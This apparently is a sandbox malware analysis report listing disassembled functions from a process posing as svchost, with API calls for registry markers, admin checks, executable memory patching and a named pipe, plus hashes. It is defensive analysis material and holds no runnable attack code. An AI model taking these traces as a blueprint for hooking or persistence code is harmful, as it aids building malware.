                                                                                                                                                                                                                    Function 02C73830 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 86COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SymGetModuleBase.DBGHELP(00000000,?,?,?), ref: 02C73889
                                                                                                                                                                                                                    • SymGetModuleInfo.DBGHELP(00000000,00000000,0000023C), ref: 02C7389C
                                                                                                                                                                                                                    • SymGetSymFromAddr.DBGHELP(00000000,?,?,00000018), ref: 02C738B3
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C738DD
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C73901
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Module_snprintf$AddrBaseFromInfo
                                                                                                                                                                                                                    • String ID: %s!%s + 0x%04x$%s!0x%08x$unknown!0x%08x
                                                                                                                                                                                                                    • API String ID: 844136142-2194319270
                                                                                                                                                                                                                    • Opcode ID: debc5e9f8d230d550c85161a7568315a262fbd6eb95dd6f97c25237b9e36c290
                                                                                                                                                                                                                    • Instruction ID: ee176164c65198b71dffdc2ec012dc55a2265955e45dc6228db0b5408bef8a28
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: debc5e9f8d230d550c85161a7568315a262fbd6eb95dd6f97c25237b9e36c290
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F212372A00198ABE7229E48DC84FFA73ACEF84700F0481D9F809A7140E7719B58DBA1
                                                                                                                                                                                                                    Function 02C822C0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C822C8
                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,02C859A4), ref: 02C822FF
                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,80F50315a,00000000,02C859A4,00000000,?,?,02C859A4), ref: 02C8231C
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,02C859A4), ref: 02C82326
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?,?,02C859A4), ref: 02C82359
                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,80F50315a,00000000,?,00000000,02C859A4,?,02C859A4), ref: 02C82376
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,02C859A4), ref: 02C82380
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                                    • String ID: 80F50315a$software\microsoft
                                                                                                                                                                                                                    • API String ID: 2113243795-2756871673
                                                                                                                                                                                                                    • Opcode ID: 922c61293b1bee8923d5a58eb8ce59a7f9aa4d8ab9767407fe72cab3fee6937f
                                                                                                                                                                                                                    • Instruction ID: 017e78e4adb00e4484c9c3d064383ffddcd4098467c60a2a5b0605639de4f87d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 922c61293b1bee8923d5a58eb8ce59a7f9aa4d8ab9767407fe72cab3fee6937f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD214175E40249FBEB01DBA4DC89FEEBBBCEF44704F104A99E905E7140E7B4A6049B54
                                                                                                                                                                                                                    Function 02C88B10 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C88B18
                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,02C88CD7), ref: 02C88B4F
                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(02C88CD7,80f5035da,00000000,?,00000000,?), ref: 02C88B6C
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(02C88CD7), ref: 02C88B76
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C88BA9
                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,80f5035da,00000000,?,00000000,?), ref: 02C88BC6
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 02C88BD0
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                                    • String ID: 80f5035da$software\microsoft
                                                                                                                                                                                                                    • API String ID: 2113243795-1475967691
                                                                                                                                                                                                                    • Opcode ID: 4493a33fad6a26744ab4a4528b16f271d32d37bc836a139fb56fbdcd00241282
                                                                                                                                                                                                                    • Instruction ID: b7628371782cf1d20c53189bd053dcf2845de122ac2e73c2e3bb5e58df35ebe3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4493a33fad6a26744ab4a4528b16f271d32d37bc836a139fb56fbdcd00241282
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28211DB5E4020DBBEB01DBA4DD85FEEBBB8EF88704F104699E501E7140E7B4A6058B94
                                                                                                                                                                                                                    Function 02C73430 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C73438
                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?), ref: 02C7346F
                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,80f502cfa,00000000,?,00000000,?), ref: 02C7348C
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 02C73496
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C734C9
                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,80f502cfa,00000000,?,00000000,?), ref: 02C734E6
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 02C734F0
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                                    • String ID: 80f502cfa$software\microsoft
                                                                                                                                                                                                                    • API String ID: 2113243795-956736100
                                                                                                                                                                                                                    • Opcode ID: 59d1c569bf5b2a2a0fe74698599c5955ffa94a4e28bbbf7d3ca57d0a61403491
                                                                                                                                                                                                                    • Instruction ID: 110012369a30d37c7ac43815baab101445165a89ae5d46bcb92c0ad8cd912cb6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59d1c569bf5b2a2a0fe74698599c5955ffa94a4e28bbbf7d3ca57d0a61403491
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8214F75E40249FBEB15CBA4DC85FEEBBB8EF48700F104699E601E7140E7B4A6059B94
                                                                                                                                                                                                                    Function 02C831A0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 114registrymemoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C831D4
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(00000104,software\microsoft,00000000,00000101,80000002,?,76230F10,00000000), ref: 02C831F7
                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(80000002,?,00000000,00000001,00000000,00000104,?,76230F10,00000000), ref: 02C8321A
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000015,?,76230F10,00000000), ref: 02C8328D
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,76230F10,00000000), ref: 02C83294
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C832A4
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(80000002,?,76230F10,00000000), ref: 02C832D2
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heapmemset$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                    • String ID: software\microsoft
                                                                                                                                                                                                                    • API String ID: 4043890984-3673152959
                                                                                                                                                                                                                    • Opcode ID: 938e5983cb5dc41a3770d10e2b755d0cd0f9b5e85c28e557abdbd5e662052f64
                                                                                                                                                                                                                    • Instruction ID: da9891e3be98d4c1a52e2c2ed95cd7b6662a5d391b76b87e312ac4960b0d8925
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 938e5983cb5dc41a3770d10e2b755d0cd0f9b5e85c28e557abdbd5e662052f64
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F31C832E042DDABCB22DB649C08BDB7BB8AFC5B08F0586D4ED5497101D770DB498B91
                                                                                                                                                                                                                    Function 02C89230 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72memorysynchronizationsleepCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000003E8), ref: 02C8924B
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,00000018,00000040,?), ref: 02C89298
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 02C892C7
                                                                                                                                                                                                                    • FlushInstructionCache.KERNEL32(00000000), ref: 02C892CE
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,00000018,?,?), ref: 02C892E2
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(?), ref: 02C892F9
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C89301
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ProtectVirtual$CacheCurrentFlushInstructionMutexObjectProcessReleaseSingleSleepWait
                                                                                                                                                                                                                    • String ID: P0#v
                                                                                                                                                                                                                    • API String ID: 842647815-3387790918
                                                                                                                                                                                                                    • Opcode ID: 61f986011ddaad9f9f5d0b6dbd3188fa6f5d00b2d0960e879eb0c59615c09e50
                                                                                                                                                                                                                    • Instruction ID: 776aa29ac6adfd7372a221d914691c6ac6f9cd4e1b74a4149aa9d8fb52a3ef11
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 61f986011ddaad9f9f5d0b6dbd3188fa6f5d00b2d0960e879eb0c59615c09e50
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A215A75A40201EFD725DF55D888F66B7A9FB88714F04CA48E60697790CB30F954CB91
                                                                                                                                                                                                                    Function 02C88BF0 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 39registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C88BF7
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 02C88C09
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(?,software\microsoft,00000000,00000102,?,?,?,?,02C88DC2), ref: 02C88C23
                                                                                                                                                                                                                    • RegSetValueExA.KERNEL32(?,80f5035da,00000000,00000004,?,00000004,software\microsoft,00000000,00000102,?,?,?,?,02C88DC2), ref: 02C88C40
                                                                                                                                                                                                                    • RegFlushKey.ADVAPI32(?,?,?,?,02C88DC2), ref: 02C88C4A
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,02C88DC2), ref: 02C88C54
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AdminCloseCountFlushOpenTickUserValue
                                                                                                                                                                                                                    • String ID: 80f5035da$software\microsoft
                                                                                                                                                                                                                    • API String ID: 287100044-1475967691
                                                                                                                                                                                                                    • Opcode ID: af3d3c3d917ee86980ea8899395568b370373d70d68ad8fb6a81ea8d3a2bf517
                                                                                                                                                                                                                    • Instruction ID: b19634f42ef7c3292fa34f6bbd09172dabb954f0f2e18e5e67ba2428723a9bd0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: af3d3c3d917ee86980ea8899395568b370373d70d68ad8fb6a81ea8d3a2bf517
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FAF03175D80258FBD701DBA0AD49F9A7B3CAF04701F104795FA06A3180D6709A1587A4
                                                                                                                                                                                                                    Function 02C93E40 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 118COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02C93E6F
                                                                                                                                                                                                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 02C93EA8
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C93F13
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C93F76
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _snprintf$DirectoryInformationSystemVolumeWindows
                                                                                                                                                                                                                    • String ID: 1234567890QWERTYUIOPASDFGHJKLZXCVBNM$7F1BFC6B$80F503C1a
                                                                                                                                                                                                                    • API String ID: 2823094833-2369066373
                                                                                                                                                                                                                    • Opcode ID: 56d286c8fbf1fcafa5865725b26843ec90a64cb741d60294705bbd3a10ff8e41
                                                                                                                                                                                                                    • Instruction ID: e0cbaeed9ecfb537269936f1a9088f204baa542f2f80854772de925ea2260573
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 56d286c8fbf1fcafa5865725b26843ec90a64cb741d60294705bbd3a10ff8e41
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE4125B2E00199ABDB15CB688D88BEEF7FEEF94300F1502E4E545AB280D7716B458780
                                                                                                                                                                                                                    Function 02C848B0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 51registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C848D8
                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(00000000,80f50428a,00000000,00000000,00000000,?), ref: 02C8491A
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 02C84924
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(-80000001), ref: 02C848EA
                                                                                                                                                                                                                      • Part of subcall function 02C73430: IsUserAnAdmin.SHELL32 ref: 02C73438
                                                                                                                                                                                                                      • Part of subcall function 02C73430: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?), ref: 02C7346F
                                                                                                                                                                                                                      • Part of subcall function 02C73430: RegQueryValueExA.ADVAPI32(?,80f502cfa,00000000,?,00000000,?), ref: 02C7348C
                                                                                                                                                                                                                      • Part of subcall function 02C73430: RegCloseKey.ADVAPI32(?), ref: 02C73496
                                                                                                                                                                                                                      • Part of subcall function 02C73430: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C734C9
                                                                                                                                                                                                                      • Part of subcall function 02C73430: RegQueryValueExA.KERNEL32(?,80f502cfa,00000000,?,00000000,?), ref: 02C734E6
                                                                                                                                                                                                                      • Part of subcall function 02C73430: RegCloseKey.ADVAPI32(?), ref: 02C734F0
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                                    • String ID: 80F50B91a$80f50428a$software\microsoft
                                                                                                                                                                                                                    • API String ID: 2113243795-3917903170
                                                                                                                                                                                                                    • Opcode ID: 66b96ee46b1c71e43464b0cad1529f1feb87841dee9d931c06d73110e0bc9115
                                                                                                                                                                                                                    • Instruction ID: 3be5ce622da499e016b5904651f4a545f69ed32f49199a27d74f66c8fb0bfc8c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 66b96ee46b1c71e43464b0cad1529f1feb87841dee9d931c06d73110e0bc9115
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA0152B5E90249ABDB14DBB4DC45FAE77BCEF44714F104B98F515E7180E77496008B90
                                                                                                                                                                                                                    Function 02C88FC0 Relevance: 12.1, APIs: 8, Instructions: 139memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,7622F550,00000000,7693BD50,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C88FF8
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89020
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,?,00000040,02C8839A,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C890B5
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,00000000,00000040,02C8839A,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C890CA
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,00000000,02C8839A,?,?,?,00000000,00000000,?,?,?,?,?,?,02C8839A,00000000), ref: 02C890FA
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,00000000,02C8839A,?,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89106
                                                                                                                                                                                                                      • Part of subcall function 02C89130: WaitForSingleObject.KERNEL32(?,000003E8,00000000,02C89113,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C8913C
                                                                                                                                                                                                                      • Part of subcall function 02C89130: GetProcessHeap.KERNEL32(00000008,00000030,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89146
                                                                                                                                                                                                                      • Part of subcall function 02C89130: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C8914D
                                                                                                                                                                                                                      • Part of subcall function 02C89130: memset.MSVCRT ref: 02C8915E
                                                                                                                                                                                                                      • Part of subcall function 02C89130: ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C891AA
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,7622F550,00000000,7693BD50,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89117
                                                                                                                                                                                                                    • FlushInstructionCache.KERNEL32(00000000,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C8911E
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Virtual$Protect$AllocHeapProcess$CacheCurrentFlushInstructionMutexObjectReleaseSingleWaitmemcpymemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2609073853-0
                                                                                                                                                                                                                    • Opcode ID: 8f021d533cd75e031d93a37704bb4763fec1ccb5118302501cceb90092ad35a6
                                                                                                                                                                                                                    • Instruction ID: 7690c3e9f1e6a4d59b50bc6c9277e97bcbfb76cd1f993ad7a093bdfbb91cb0f5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f021d533cd75e031d93a37704bb4763fec1ccb5118302501cceb90092ad35a6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22410072A40216B7CB10AE788C88FBB777AEF94258F448619F94597384DB35E901C7E0
                                                                                                                                                                                                                    Function 00402240 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74filetimeCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileA.KERNEL32(\\.\pipe\acsipc_server,C0000000,00000003,?,00000003,80000080,00000000,00000000), ref: 004022D6
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,D48A445E,00000028,?,00000000), ref: 004022F6
                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 004022FC
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,B5CB6C63,0000001C,?,00000000), ref: 0040231A
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040231D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3402365018.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$TimeWrite$CloseCreateHandleSystem
                                                                                                                                                                                                                    • String ID: \\.\pipe\acsipc_server
                                                                                                                                                                                                                    • API String ID: 3225117150-898603304
                                                                                                                                                                                                                    • Opcode ID: f30bb11f5613f8d38f8c23486348982fdc31315c85d836d9b114ebf2302f727f
                                                                                                                                                                                                                    • Instruction ID: c460779fd0431372b53d2531d074c5320f53f755a2dac54515a3a2487e8d4eb8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f30bb11f5613f8d38f8c23486348982fdc31315c85d836d9b114ebf2302f727f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA31F4B1C0121CAFDB10DFD5D985AEEFBB8FB48314F10422AE614BB280D7B41A458F95
                                                                                                                                                                                                                    Function 02C737C0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,software\microsoft,00000000,00000102,?,?,?,02C73A91,?), ref: 02C737E0
                                                                                                                                                                                                                    • RegSetValueExA.KERNEL32(00000000,80f50271a,00000000,00000004,?,00000004,?,?,02C73A91,?), ref: 02C737FC
                                                                                                                                                                                                                    • RegFlushKey.ADVAPI32(00000000,?,?,02C73A91,?), ref: 02C7380A
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,02C73A91,?), ref: 02C73818
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
